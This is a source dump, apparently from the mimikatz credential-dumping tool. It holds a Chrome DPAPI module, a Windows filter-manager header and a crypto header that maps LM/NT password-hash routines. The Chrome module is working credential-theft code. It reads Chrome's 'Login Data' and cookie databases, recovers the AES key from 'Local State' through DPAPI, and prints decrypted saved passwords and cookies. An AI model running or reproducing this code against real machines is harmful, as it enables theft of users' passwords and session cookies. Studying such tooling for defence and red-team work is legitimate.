13 | sqlite3 *pDb;
14 | sqlite3_stmt * pStmt;
15 | __int64 i64;
16 | BYTE key[AES_256_KEY_SIZE];
17 | BCRYPT_ALG_HANDLE hAlg = NULL;
18 | BCRYPT_KEY_HANDLE hKey = NULL;
19 |
20 | if(kull_m_string_args_byName(argc, argv, L"in", &infile, NULL))
21 | {
22 | if(kull_m_string_args_byName(argc, argv, L"key", &szKey, NULL))
23 | {
24 | if(kull_m_string_stringToHex(szKey, key, sizeof(key)))
25 | kuhl_m_dpapi_chrome_alg_key_from_raw(key, &hAlg, &hKey);
26 | else PRINT_ERROR(L"kull_m_string_stringToHex!\n");
27 | }
28 | else if(kull_m_string_args_byName(argc, argv, L"encryptedkey", &szKey, NULL))
29 | kuhl_m_dpapi_chrome_alg_key_from_b64(szKey, argc, argv, &hAlg, &hKey);
30 | else if(kull_m_string_args_byName(argc, argv, L"state", &szKey, NULL))
31 | kuhl_m_dpapi_chrome_alg_key_from_file(szKey, TRUE, argc, argv, &hAlg, &hKey);
32 | else kuhl_m_dpapi_chrome_alg_key_from_auto(infile, argc, argv, &hAlg, &hKey);
33 |
34 | if(aInfile = kull_m_string_unicode_to_ansi(infile))
35 | {
36 | rc = sqlite3_initialize();
37 | if(rc == SQLITE_OK)
38 | {
39 | rc = sqlite3_open_v2(aInfile, &pDb, SQLITE_OPEN_READONLY, "win32-none");
40 | if(rc == SQLITE_OK)
41 | {
42 | if(kuhl_m_dpapi_chrome_isTableExist(pDb, "logins"))
43 | {
44 | rc = sqlite3_prepare_v2(pDb, "select signon_realm, origin_url, username_value, password_value from logins", -1, &pStmt, NULL);
45 | if(rc == SQLITE_OK)
46 | {
47 | while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW)
48 | {
49 | kprintf(L"\nURL: %.*S ( %.*S )\nUSN: %.*S\n",
50 | sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0),
51 | sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1),
52 | sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2));
53 | kuhl_m_dpapi_chrome_decrypt(sqlite3_column_blob(pStmt, 3), sqlite3_column_bytes(pStmt, 3), hAlg, hKey, argc, argv, L"PWD");
54 | }
55 | if(rc != SQLITE_DONE)
56 | PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
57 | }
58 | else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
59 | sqlite3_finalize(pStmt);
60 | }
61 | else if(kuhl_m_dpapi_chrome_isTableExist(pDb, "cookies"))
62 | {
63 | rc = sqlite3_prepare_v2(pDb, "select host_key, path, name, creation_utc, expires_utc, encrypted_value from cookies order by host_key, path, name", -1, &pStmt, NULL);
64 | if(rc == SQLITE_OK)
65 | {
66 | while(rc = sqlite3_step(pStmt), rc == SQLITE_ROW)
67 | {
68 | kprintf(L"\nHost: %.*S ( %.*S )\nName: %.*S\nDate: ",
69 | sqlite3_column_bytes(pStmt, 0), sqlite3_column_text(pStmt, 0),
70 | sqlite3_column_bytes(pStmt, 1), sqlite3_column_text(pStmt, 1),
71 | sqlite3_column_bytes(pStmt, 2), sqlite3_column_text(pStmt, 2));
72 | i64 = sqlite3_column_int64(pStmt, 3) * 10;
73 | kull_m_string_displayLocalFileTime((LPFILETIME) &i64);
74 | i64 = sqlite3_column_int64(pStmt, 4) * 10;
75 | if(i64)
76 | {
77 | kprintf(L" -> ");
78 | kull_m_string_displayLocalFileTime((LPFILETIME) &i64);
79 | }
80 | kprintf(L"\n");
81 | kuhl_m_dpapi_chrome_decrypt(sqlite3_column_blob(pStmt, 5), sqlite3_column_bytes(pStmt, 5), hAlg, hKey, argc, argv, L"Cook");
82 | }
83 | if(rc != SQLITE_DONE)
84 | PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
85 | }
86 | else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
87 | sqlite3_finalize(pStmt);
88 | }
89 | else PRINT_ERROR(L"Neither the table \'logins\' or the table \'cookies\' exist!\n");
90 | }
91 | else PRINT_ERROR(L"sqlite3_open_v2: %S (%S)\n", sqlite3_errmsg(pDb), aInfile);
92 | rc = sqlite3_close_v2(pDb);
93 | rc = sqlite3_shutdown();
94 | }
95 | else PRINT_ERROR(L"sqlite3_initialize: 3x%15x\n", rc);
96 | LocalFree(aInfile);
97 | }
98 | kuhl_m_dpapi_chrome_free_alg_key(&hAlg, &hKey);
99 | }
100 | else PRINT_ERROR(L"Input \'Login Data\' file needed (/in:\"%%localappdata%%\\Google\\Chrome\\User Data\\Default\\Login Data\")\n");
101 | return STATUS_SUCCESS;
102 | }
103 |
104 | BOOL kuhl_m_dpapi_chrome_isTableExist(sqlite3 *pDb, const char *table)
105 | {
106 | BOOL status = FALSE;
107 | sqlite3_stmt * pStmt;
108 | int rc;
109 | rc = sqlite3_prepare_v2(pDb, "select count(*) from sqlite_master where type=\'table\' and name=?", -1, &pStmt, NULL);
110 | if(rc == SQLITE_OK)
111 | {
112 | rc = sqlite3_bind_text(pStmt, 1, table, -1, SQLITE_STATIC);
113 | if(rc == SQLITE_OK)
114 | {
115 | rc = sqlite3_step(pStmt);
116 | if(rc == SQLITE_ROW)
117 | status = sqlite3_column_int(pStmt, 0) > 0;
118 | else PRINT_ERROR(L"sqlite3_step: %S\n", sqlite3_errmsg(pDb));
119 | }
120 | else PRINT_ERROR(L"sqlite3_bind_text: %S\n", sqlite3_errmsg(pDb));
121 | }
122 | else PRINT_ERROR(L"sqlite3_prepare_v2: %S\n", sqlite3_errmsg(pDb));
123 | sqlite3_finalize(pStmt);
124 | return status;
125 | }
126 |
127 | const BYTE KUHL_M_DPAPI_CHROME_UNKV10[] = {'v', '1', '0'};
128 | void kuhl_m_dpapi_chrome_decrypt(LPCVOID pData, DWORD dwData, BCRYPT_ALG_HANDLE hAlg, BCRYPT_KEY_HANDLE hKey, int argc, wchar_t * argv[], LPCWSTR type)
129 | {
130 | LPVOID pDataOut;
131 | DWORD dwDataOutLen;
132 | NTSTATUS nStatus;
133 | BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO info;
134 | if((dwData >= sizeof(KUHL_M_DPAPI_CHROME_UNKV10)) && RtlEqualMemory(pData, KUHL_M_DPAPI_CHROME_UNKV10, sizeof(KUHL_M_DPAPI_CHROME_UNKV10)))
135 | {
136 | if(hAlg && hKey)
137 | {
138 | BCRYPT_INIT_AUTH_MODE_INFO(info);
139 | info.pbNonce = (PBYTE) pData + sizeof(KUHL_M_DPAPI_CHROME_UNKV10);
140 | info.cbNonce = 12;
141 | info.pbTag = info.pbNonce + dwData - (sizeof(KUHL_M_DPAPI_CHROME_UNKV10) + AES_BLOCK_SIZE); //
142 | info.cbTag = AES_BLOCK_SIZE; //
143 | dwDataOutLen = dwData - sizeof(KUHL_M_DPAPI_CHROME_UNKV10) - info.cbNonce - info.cbTag;
144 | if(pDataOut = LocalAlloc(LPTR, dwDataOutLen))
145 | {
146 | nStatus = BCryptDecrypt(hKey, info.pbNonce + info.cbNonce, dwDataOutLen, &info, NULL, 0, (PUCHAR) pDataOut, dwDataOutLen, &dwDataOutLen, 0);
147 | if(NT_SUCCESS(nStatus))
148 | kprintf(L"%s: %.*S\n", type, dwDataOutLen, pDataOut);
149 | else PRINT_ERROR(L"BCryptDecrypt: 3x%15x\n", nStatus);
150 | LocalFree(pDataOut);
151 | }
152 | }
153 | else PRINT_ERROR(L"No Alg and/or Key handle despite AES encryption\n");
154 | }
155 | else if(kuhl_m_dpapi_unprotect_raw_or_blob(pData, dwData, NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
156 | {
157 | kprintf(L"%s: %.*S\n", type, dwDataOutLen, pDataOut);
158 | LocalFree(pDataOut);
159 | }
160 | }
161 |
162 | void kuhl_m_dpapi_chrome_free_alg_key(BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey)
163 | {
164 | if(hAlg)
165 | if(*hAlg)
166 | {
167 | BCryptCloseAlgorithmProvider(*hAlg, 0);
168 | *hAlg = NULL;
169 | }
170 | if(hKey)
171 | if(*hKey)
172 | {
173 | BCryptDestroyKey(*hKey);
174 | *hKey = NULL;
175 | }
176 | }
177 |
178 | BOOL kuhl_m_dpapi_chrome_alg_key_from_raw(BYTE key[AES_256_KEY_SIZE], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey)
179 | {
180 | BOOL status = FALSE;
181 | NTSTATUS nStatus;
182 | *hAlg = NULL;
183 | *hKey = NULL;
184 |
185 | __try
186 | {
187 | nStatus = BCryptOpenAlgorithmProvider(hAlg, BCRYPT_AES_ALGORITHM, NULL, 0);
188 | if(NT_SUCCESS(nStatus))
189 | {
190 | nStatus = BCryptSetProperty(*hAlg, BCRYPT_CHAINING_MODE, (PUCHAR) BCRYPT_CHAIN_MODE_GCM, sizeof(BCRYPT_CHAIN_MODE_GCM), 0);
191 | if(NT_SUCCESS(nStatus))
192 | {
193 | nStatus = BCryptGenerateSymmetricKey(*hAlg, hKey, NULL, 0, key, AES_256_KEY_SIZE, 0);
194 | if(NT_SUCCESS(nStatus))
195 | status = TRUE;
196 | else PRINT_ERROR(L"BCryptGenerateSymmetricKey: 3x%15x\n", nStatus);
197 | }
198 | else PRINT_ERROR(L"BCryptSetProperty: 3x%15x\n", nStatus);
199 | if(!status)
200 | kuhl_m_dpapi_chrome_free_alg_key(hAlg, hKey);
201 | }
202 | else PRINT_ERROR(L"BCryptOpenAlgorithmProvider: 3x%15x\n", nStatus);
203 | }
204 | __except(GetExceptionCode() == ERROR_DLL_NOT_FOUND)
205 | {
206 | PRINT_ERROR(L"No CNG\n");
207 | }
208 |
209 | return status;
210 | }
211 |
212 | const BYTE KUHL_M_DPAPI_CHROME_DPAPI[] = {'D', 'P', 'A', 'P', 'I'};
213 | BOOL kuhl_m_dpapi_chrome_alg_key_from_b64(LPCWSTR base64, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey)
214 | {
215 | BOOL status = FALSE;
216 | PBYTE keyWithHeader, rawKey;
217 | DWORD dwKeyWithHeader, dwRawKey;
218 |
219 | if(kull_m_string_quick_base64_to_Binary(base64, &keyWithHeader, &dwKeyWithHeader))
220 | {
221 | if((dwKeyWithHeader >= sizeof(KUHL_M_DPAPI_CHROME_DPAPI)) && RtlEqualMemory(keyWithHeader, KUHL_M_DPAPI_CHROME_DPAPI, sizeof(KUHL_M_DPAPI_CHROME_DPAPI)))
222 | {
223 | kprintf(L"Key is protected by DPAPI\n");
224 | if(kuhl_m_dpapi_unprotect_raw_or_blob(keyWithHeader + sizeof(KUHL_M_DPAPI_CHROME_DPAPI), dwKeyWithHeader - sizeof(KUHL_M_DPAPI_CHROME_DPAPI), NULL, argc, argv, NULL, 0, (LPVOID *) &rawKey, &dwRawKey, NULL))
225 | {
226 | if(dwRawKey == AES_256_KEY_SIZE)
227 | {
228 | kprintf(L"AES Key is: ");
229 | kull_m_string_wprintf_hex(rawKey, AES_256_KEY_SIZE, 0);
230 | kprintf(L"\n");
231 | status = kuhl_m_dpapi_chrome_alg_key_from_raw(rawKey, hAlg, hKey);
232 | }
233 | else PRINT_ERROR(L"Key size: %u (needs %u)\n", dwRawKey, AES_256_KEY_SIZE);
234 | LocalFree(rawKey);
235 | }
236 | }
237 | else PRINT_ERROR(L"Bad header\n");
238 | LocalFree(keyWithHeader);
239 | }
240 | else PRINT_ERROR_AUTO(L"kull_m_string_quick_base64_to_Binary");
241 | return status;
242 | }
243 |
244 | BOOL kuhl_m_dpapi_chrome_alg_key_from_file(LPCWSTR szState, BOOL forced, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey)
245 | {
246 | BOOL status = FALSE;
247 | PBYTE data;
248 | DWORD dwData;
249 | wchar_t *uData, *begin, *end;
250 | if(kull_m_file_readData(szState, &data, &dwData))
251 | {
252 | if(uData = kull_m_string_qad_ansi_c_to_unicode((const char *) data, dwData))
253 | {
254 | if(begin = wcsstr(uData, L"\"os_crypt\":{\"encrypted_key\":\""))
255 | {
256 | begin += 29;
257 | if(end = wcsstr(begin, L"\"}"))
258 | {
259 | end = L'\0';
260 | kprintf(L"Key found in file\n");
261 | status = kuhl_m_dpapi_chrome_alg_key_from_b64(begin, argc, argv, hAlg, hKey);
262 | }
263 | else PRINT_ERROR(L"Unable to find the end of the encrypted_key\n");
264 | }
265 | else if(forced) PRINT_ERROR(L"encrypted_key not fond in state file.\n");
266 | LocalFree(uData);
267 | }
268 | LocalFree(data);
269 | }
270 | else if(forced) PRINT_ERROR_AUTO(L"kull_m_file_readData");
271 | return status;
272 | }
273 |
274 | BOOL kuhl_m_dpapi_chrome_alg_key_from_auto(LPCWSTR szFile, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey)
275 | {
276 | BOOL status = FALSE;
277 | wchar_t *duplicate, *pe, *tentative;
278 | if(szFile && (duplicate = _wcsdup(szFile)))
279 | {
280 | if(pe = wcsrchr(duplicate, L'\\'))
281 | {
282 | *pe = L'\0';
283 | if(pe = wcsrchr(duplicate, L'\\'))
284 | {
285 | *pe = L'\0';
286 | if(kull_m_string_sprintf(&tentative, L"%s\\Local State", duplicate))
287 | {
288 | status = kuhl_m_dpapi_chrome_alg_key_from_file(tentative, FALSE, argc, argv, hAlg, hKey);
289 | LocalFree(tentative);
290 | }
291 | }
292 | }
293 | free(duplicate);
294 | }
295 | return status;
296 | }
--------------------------------------------------------------------------------
/inc/fltUser.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | Copyright (c) 1989-2002 Microsoft Corporation
4 |
5 | Module Name:
6 |
7 | fltUser.h
8 |
9 | Abstract:
10 | Header file which contains the structures, type definitions,
11 | constants, global variables and function prototypes that are
12 | visible to user mode applications that interact with filters.
13 |
14 | Environment:
15 |
16 | User mode
17 |
18 | --*/
19 | #ifndef __FLTUSER_H__
20 | #define __FLTUSER_H__
21 |
22 | //
23 | // IMPORTANT!!!!!
24 | //
25 | // This is how FltMgr was released (from oldest to newest)
26 | // xpsp2, (srv03, w2ksp5), LH, Win7
27 | //
28 |
29 | //
30 | // The defines items that are part of the filter manager baseline
31 | //
32 |
33 | #define FLT_MGR_BASELINE (((OSVER(NTDDI_VERSION) == NTDDI_WIN2K) && (SPVER(NTDDI_VERSION) >= SPVER(NTDDI_WIN2KSP4))) || \
34 | ((OSVER(NTDDI_VERSION) == NTDDI_WINXP) && (SPVER(NTDDI_VERSION) >= SPVER(NTDDI_WINXPSP2))) || \
35 | ((OSVER(NTDDI_VERSION) == NTDDI_WS03) && (SPVER(NTDDI_VERSION) >= SPVER(NTDDI_WS03SP1))) || \
36 | (NTDDI_VERSION >= NTDDI_VISTA))
37 |
38 | //
39 | // This defines items that were added after XPSP2 was released. This means
40 | // they are in Srv03 SP1, W2K SP4+URP, and Longhorn and above.
41 | //
42 |
43 | #define FLT_MGR_AFTER_XPSP2 (((OSVER(NTDDI_VERSION) == NTDDI_WIN2K) && (SPVER(NTDDI_VERSION) >= SPVER(NTDDI_WIN2KSP4))) || \
44 | ((OSVER(NTDDI_VERSION) == NTDDI_WINXP) && (SPVER(NTDDI_VERSION) > SPVER(NTDDI_WINXPSP2))) || \
45 | ((OSVER(NTDDI_VERSION) == NTDDI_WS03) && (SPVER(NTDDI_VERSION) >= SPVER(NTDDI_WS03SP1))) || \
46 | (NTDDI_VERSION >= NTDDI_VISTA))
47 |
48 | //
49 | // This defines items that only exist in longhorn or later
50 | //
51 |
52 | #define FLT_MGR_LONGHORN (NTDDI_VERSION >= NTDDI_VISTA)
53 |
54 | //
55 | // This defines items that only exist in Windows 7 or later
56 | //
57 |
58 | #define FLT_MGR_WIN7 (NTDDI_VERSION >= NTDDI_WIN7)
59 |
60 |
61 |
62 | ///////////////////////////////////////////////////////////////////////////////
63 | //
64 | // Standard includes
65 | //
66 | ///////////////////////////////////////////////////////////////////////////////
67 |
68 | #include
69 |
70 | #ifdef __cplusplus
71 | extern "C" {
72 | #endif
73 |
74 | //
75 | // These are all of the baseline set of user-mode functions in FltMgr.
76 | //
77 |
78 | #if FLT_MGR_BASELINE
79 |
80 | //
81 | // Functions for loading, unloading and monitoring Filters
82 | //
83 |
84 | __checkReturn
85 | HRESULT
86 | WINAPI
87 | FilterLoad (
88 | __in LPCWSTR lpFilterName
89 | );
90 |
91 | __checkReturn
92 | HRESULT
93 | WINAPI
94 | FilterUnload (
95 | __in LPCWSTR lpFilterName
96 | );
97 |
98 |
99 | //****************************************************************************
100 | //
101 | // Functions for creating and closing handles
102 | //
103 | //****************************************************************************
104 |
105 | //
106 | // Filter
107 | //
108 |
109 | __checkReturn
110 | HRESULT
111 | WINAPI
112 | FilterCreate (
113 | __in LPCWSTR lpFilterName,
114 | __deref_out HFILTER *hFilter
115 | );
116 |
117 | HRESULT
118 | WINAPI
119 | FilterClose(
120 | __in HFILTER hFilter
121 | );
122 |
123 | //
124 | // FilterInstance
125 | //
126 |
127 | __checkReturn
128 | HRESULT
129 | WINAPI
130 | FilterInstanceCreate (
131 | __in LPCWSTR lpFilterName,
132 | __in LPCWSTR lpVolumeName,
133 | __in_opt LPCWSTR lpInstanceName,
134 | __deref_out HFILTER_INSTANCE *hInstance
135 | );
136 |
137 | HRESULT
138 | WINAPI
139 | FilterInstanceClose(
140 | __in HFILTER_INSTANCE hInstance
141 | );
142 |
143 |
144 | //****************************************************************************
145 | //
146 | // Functions for creating and deleting FilterInstances in the
147 | // device stack.
148 | //
149 | //****************************************************************************
150 |
151 | __checkReturn
152 | HRESULT
153 | WINAPI
154 | FilterAttach (
155 | __in LPCWSTR lpFilterName,
156 | __in LPCWSTR lpVolumeName,
157 | __in_opt LPCWSTR lpInstanceName ,
158 | __in_opt DWORD dwCreatedInstanceNameLength ,
159 | __out_bcount_opt(dwCreatedInstanceNameLength) LPWSTR lpCreatedInstanceName
160 | );
161 |
162 | __checkReturn
163 | HRESULT
164 | WINAPI
165 | FilterAttachAtAltitude (
166 | __in LPCWSTR lpFilterName,
167 | __in LPCWSTR lpVolumeName,
168 | __in LPCWSTR lpAltitude,
169 | __in_opt LPCWSTR lpInstanceName ,
170 | __in_opt DWORD dwCreatedInstanceNameLength ,
171 | __out_bcount_opt(dwCreatedInstanceNameLength) LPWSTR lpCreatedInstanceName
172 | );
173 |
174 | __checkReturn
175 | HRESULT
176 | WINAPI
177 | FilterDetach (
178 | __in LPCWSTR lpFilterName,
179 | __in LPCWSTR lpVolumeName,
180 | __in_opt LPCWSTR lpInstanceName
181 | );
182 |
183 |
184 | //****************************************************************************
185 | //
186 | // Functions for iterating through Filters and FilterInstances and
187 | // getting information on a Filter or FilterInstance.
188 | //
189 | //****************************************************************************
190 |
191 | //
192 | // Functions for iterating through Filters
193 | //
194 |
195 | __checkReturn
196 | HRESULT
197 | WINAPI
198 | FilterFindFirst (
199 | __in FILTER_INFORMATION_CLASS dwInformationClass,
200 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
201 | __in DWORD dwBufferSize,
202 | __out LPDWORD lpBytesReturned,
203 | __out LPHANDLE lpFilterFind
204 | );
205 |
206 | __checkReturn
207 | HRESULT
208 | WINAPI
209 | FilterFindNext (
210 | __in HANDLE hFilterFind,
211 | __in FILTER_INFORMATION_CLASS dwInformationClass,
212 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
213 | __in DWORD dwBufferSize,
214 | __out LPDWORD lpBytesReturned
215 | );
216 |
217 | __checkReturn
218 | HRESULT
219 | WINAPI
220 | FilterFindClose(
221 | __in HANDLE hFilterFind
222 | );
223 |
224 |
225 | __checkReturn
226 | HRESULT
227 | WINAPI
228 | FilterVolumeFindFirst (
229 | __in FILTER_VOLUME_INFORMATION_CLASS dwInformationClass,
230 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
231 | __in DWORD dwBufferSize,
232 | __out LPDWORD lpBytesReturned,
233 | __out PHANDLE lpVolumeFind
234 | );
235 |
236 | __checkReturn
237 | HRESULT
238 | WINAPI
239 | FilterVolumeFindNext (
240 | __in HANDLE hVolumeFind,
241 | __in FILTER_VOLUME_INFORMATION_CLASS dwInformationClass,
242 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
243 | __in DWORD dwBufferSize,
244 | __out LPDWORD lpBytesReturned
245 | );
246 |
247 | HRESULT
248 | WINAPI
249 | FilterVolumeFindClose(
250 | __in HANDLE hVolumeFind
251 | );
252 |
253 | //
254 | // Functions for iterating through FilterInstances
255 | //
256 |
257 | __checkReturn
258 | HRESULT
259 | WINAPI
260 | FilterInstanceFindFirst (
261 | __in LPCWSTR lpFilterName,
262 | __in INSTANCE_INFORMATION_CLASS dwInformationClass,
263 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
264 | __in DWORD dwBufferSize,
265 | __out LPDWORD lpBytesReturned,
266 | __out LPHANDLE lpFilterInstanceFind
267 | );
268 |
269 | __checkReturn
270 | HRESULT
271 | WINAPI
272 | FilterInstanceFindNext (
273 | __in HANDLE hFilterInstanceFind,
274 | __in INSTANCE_INFORMATION_CLASS dwInformationClass,
275 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
276 | __in DWORD dwBufferSize,
277 | __out LPDWORD lpBytesReturned
278 | );
279 |
280 | __checkReturn
281 | HRESULT
282 | WINAPI
283 | FilterInstanceFindClose(
284 | __in HANDLE hFilterInstanceFind
285 | );
286 |
287 |
288 | //
289 | // Functions for iterating through VolumeInstances
290 | //
291 |
292 | __checkReturn
293 | HRESULT
294 | WINAPI
295 | FilterVolumeInstanceFindFirst (
296 | __in LPCWSTR lpVolumeName,
297 | __in INSTANCE_INFORMATION_CLASS dwInformationClass,
298 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
299 | __in DWORD dwBufferSize,
300 | __out LPDWORD lpBytesReturned,
301 | __out LPHANDLE lpVolumeInstanceFind
302 | );
303 |
304 | __checkReturn
305 | HRESULT
306 | WINAPI
307 | FilterVolumeInstanceFindNext (
308 | __in HANDLE hVolumeInstanceFind,
309 | __in INSTANCE_INFORMATION_CLASS dwInformationClass,
310 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
311 | __in DWORD dwBufferSize,
312 | __out LPDWORD lpBytesReturned
313 | );
314 |
315 | HRESULT
316 | WINAPI
317 | FilterVolumeInstanceFindClose(
318 | __in HANDLE hVolumeInstanceFind
319 | );
320 |
321 |
322 | //
323 | // Functions for getting information on Filters and FilterInstances
324 | //
325 |
326 | __checkReturn
327 | HRESULT
328 | WINAPI
329 | FilterGetInformation (
330 | __in HFILTER hFilter,
331 | __in FILTER_INFORMATION_CLASS dwInformationClass,
332 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
333 | __in DWORD dwBufferSize,
334 | __out LPDWORD lpBytesReturned
335 | );
336 |
337 | __checkReturn
338 | HRESULT
339 | WINAPI
340 | FilterInstanceGetInformation (
341 | __in HFILTER_INSTANCE hInstance,
342 | __in INSTANCE_INFORMATION_CLASS dwInformationClass,
343 | __out_bcount_part(dwBufferSize,*lpBytesReturned) LPVOID lpBuffer,
344 | __in DWORD dwBufferSize,
345 | __out LPDWORD lpBytesReturned
346 | );
347 |
348 |
349 | //****************************************************************************
350 | //
351 | // Functions for communicating with Filters and FilterInstances
352 | //
353 | //****************************************************************************
354 |
355 | __checkReturn
356 | HRESULT
357 | WINAPI
358 | FilterConnectCommunicationPort(
359 | __in LPCWSTR lpPortName,
360 | __in DWORD dwOptions,
361 | __in_bcount_opt(wSizeOfContext) LPCVOID lpContext,
362 | __in WORD wSizeOfContext,
363 | __in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes ,
364 | __deref_out HANDLE *hPort
365 | );
366 |
367 | __checkReturn
368 | HRESULT
369 | WINAPI
370 | FilterSendMessage (
371 | __in HANDLE hPort,
372 | __in_bcount_opt(dwInBufferSize) LPVOID lpInBuffer,
373 | __in DWORD dwInBufferSize,
374 | __out_bcount_part_opt(dwOutBufferSize,*lpBytesReturned) LPVOID lpOutBuffer,
375 | __in DWORD dwOutBufferSize,
376 | __out LPDWORD lpBytesReturned
377 | );
378 |
379 | __checkReturn
380 | HRESULT
381 | WINAPI
382 | FilterGetMessage (
383 | __in HANDLE hPort,
384 | __out_bcount(dwMessageBufferSize) PFILTER_MESSAGE_HEADER lpMessageBuffer,
385 | __in DWORD dwMessageBufferSize,
386 | __inout LPOVERLAPPED lpOverlapped
387 | );
388 |
389 | __checkReturn
390 | HRESULT
391 | WINAPI
392 | FilterReplyMessage (
393 | __in HANDLE hPort,
394 | __in_bcount(dwReplyBufferSize) PFILTER_REPLY_HEADER lpReplyBuffer,
395 | __in DWORD dwReplyBufferSize
396 | );
397 |
398 | //****************************************************************************
399 | //
400 | // Other support functions
401 | //
402 | //****************************************************************************
403 |
404 | __checkReturn
405 | HRESULT
406 | WINAPI
407 | FilterGetDosName (
408 | __in LPCWSTR lpVolumeName,
409 | __out_ecount(dwDosNameBufferSize) LPWSTR lpDosName,
410 | __in DWORD dwDosNameBufferSize
411 | );
412 |
413 | #endif // end the FLT_MGR_BASELINE
414 |
415 | #ifdef __cplusplus
416 | } // Balance extern "C" above
417 | #endif
418 |
419 | #endif /* __FLTUSER_H__ */
420 |
421 |
--------------------------------------------------------------------------------
/modules/kull_m_crypto_system.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kull_m_string.h"
9 |
10 | #define MD4_DIGEST_LENGTH 16
11 | #define MD5_DIGEST_LENGTH 16
12 | #define SHA_DIGEST_LENGTH 20
13 |
14 | #define DES_KEY_LENGTH 7
15 | #define DES_BLOCK_LENGTH 8
16 | #define AES_128_KEY_LENGTH 16
17 | #define AES_256_KEY_LENGTH 32
18 |
19 | #if !defined(IPSEC_FLAG_CHECK)
20 | #define IPSEC_FLAG_CHECK 0xf42a19b6
21 | #endif
22 |
23 | typedef struct _MD4_CTX {
24 | DWORD state[4];
25 | DWORD count[2];
26 | BYTE buffer[64];
27 | BYTE digest[MD4_DIGEST_LENGTH];
28 | } MD4_CTX, *PMD4_CTX;
29 |
30 | typedef struct _MD5_CTX {
31 | DWORD count[2];
32 | DWORD state[4];
33 | BYTE buffer[64];
34 | BYTE digest[MD5_DIGEST_LENGTH];
35 | } MD5_CTX, *PMD5_CTX;
36 |
37 | typedef struct _SHA_CTX {
38 | BYTE buffer[64];
39 | DWORD state[5];
40 | DWORD count[2];
41 | DWORD unk[6]; // to avoid error on XP
42 | } SHA_CTX, *PSHA_CTX;
43 |
44 | typedef struct _SHA_DIGEST {
45 | BYTE digest[SHA_DIGEST_LENGTH];
46 | } SHA_DIGEST, *PSHA_DIGEST;
47 |
48 | typedef struct _CRYPT_BUFFER {
49 | DWORD Length;
50 | DWORD MaximumLength;
51 | PVOID Buffer;
52 | } CRYPT_BUFFER, *PCRYPT_BUFFER, DATA_KEY, *PDATA_KEY, CLEAR_DATA, *PCLEAR_DATA, CYPHER_DATA, *PCYPHER_DATA;
53 |
54 | VOID WINAPI MD4Init(PMD4_CTX pCtx);
55 | VOID WINAPI MD4Update(PMD4_CTX pCtx, LPCVOID data, DWORD cbData);
56 | VOID WINAPI MD4Final(PMD4_CTX pCtx);
57 |
58 | VOID WINAPI MD5Init(PMD5_CTX pCtx);
59 | VOID WINAPI MD5Update(PMD5_CTX pCtx, LPCVOID data, DWORD cbData);
60 | VOID WINAPI MD5Final(PMD5_CTX pCtx);
61 |
62 | VOID WINAPI A_SHAInit(PSHA_CTX pCtx);
63 | VOID WINAPI A_SHAUpdate(PSHA_CTX pCtx, LPCVOID data, DWORD cbData);
64 | VOID WINAPI A_SHAFinal(PSHA_CTX pCtx, PSHA_DIGEST pDigest);
65 |
66 | #define RtlEncryptBlock SystemFunction001 // DES
67 | #define RtlDecryptBlock SystemFunction002 // DES
68 | #define RtlEncryptStdBlock SystemFunction003 // DES with key "KGS!@#$%" for LM hash
69 | #define RtlEncryptData SystemFunction004 // DES/ECB
70 | #define RtlDecryptData SystemFunction005 // DES/ECB
71 | #define RtlCalculateLmOwfPassword SystemFunction006
72 | #define RtlCalculateNtOwfPassword SystemFunction007
73 | #define RtlCalculateLmResponse SystemFunction008
74 | #define RtlCalculateNtResponse SystemFunction009
75 | #define RtlCalculateUserSessionKeyLm SystemFunction010
76 | #define RtlCalculateUserSessionKeyNt SystemFunction011
77 | #define RtlEncryptLmOwfPwdWithLmOwfPwd SystemFunction012
78 | #define RtlDecryptLmOwfPwdWithLmOwfPwd SystemFunction013
79 | #define RtlEncryptNtOwfPwdWithNtOwfPwd SystemFunction014
80 | #define RtlDecryptNtOwfPwdWithNtOwfPwd SystemFunction015
81 | #define RtlEncryptLmOwfPwdWithLmSesKey SystemFunction016
82 | #define RtlDecryptLmOwfPwdWithLmSesKey SystemFunction017
83 | #define RtlEncryptNtOwfPwdWithNtSesKey SystemFunction018
84 | #define RtlDecryptNtOwfPwdWithNtSesKey SystemFunction019
85 | #define RtlEncryptLmOwfPwdWithUserKey SystemFunction020
86 | #define RtlDecryptLmOwfPwdWithUserKey SystemFunction021
87 | #define RtlEncryptNtOwfPwdWithUserKey SystemFunction022
